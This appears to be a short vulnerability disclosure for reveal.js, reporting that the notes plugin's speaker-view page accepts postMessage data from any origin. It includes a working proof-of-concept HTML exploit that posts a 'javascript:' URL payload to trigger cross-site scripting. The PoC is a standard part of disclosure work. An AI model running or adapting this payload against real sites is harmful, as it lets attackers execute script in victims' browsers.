The onmessage
event listener in /plugin/notes/speaker-view.html
does not check the origin of postMessage before adding the content to the webpage. The vulnerable code allows any origin to postMessage on the browser window and feeds attacker’s input to parts using which attacker can execute arbitrary javascript code on victim’s browser window hosting reveal.js
Video PoC: https://drive.google.com/file/d/1HVlEnmLJTjHJ5VGgz8CBdEXB7FXtomkv/view
STEP 1: Run npm start
STEP 2: Attacker hosts the following code on his website.
NOTE: Please change TARGET
in the code
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Exploit reveal.js XSS</title>
</head>
<body>
<script type="text/javascript">
var TARGET = "http://localhost:8000/plugin/notes/speaker-view.html";
window.poc = window.open(TARGET);
var PAYLOAD = `{"namespace":"reveal-notes", "type": "connect", "url":"javascript:alert(document.domain)//", "state": {"indexh": "31337", "indexv": "31337"}}`;
setTimeout(function () {window.poc.postMessage(PAYLOAD,'*')},3000);
</script>
</body>
</html>
STEP 3: Victim visits attacker’s website and XSS pop-up will show domain name.
Attacker can execute arbitrary javascript code in the victim’s browser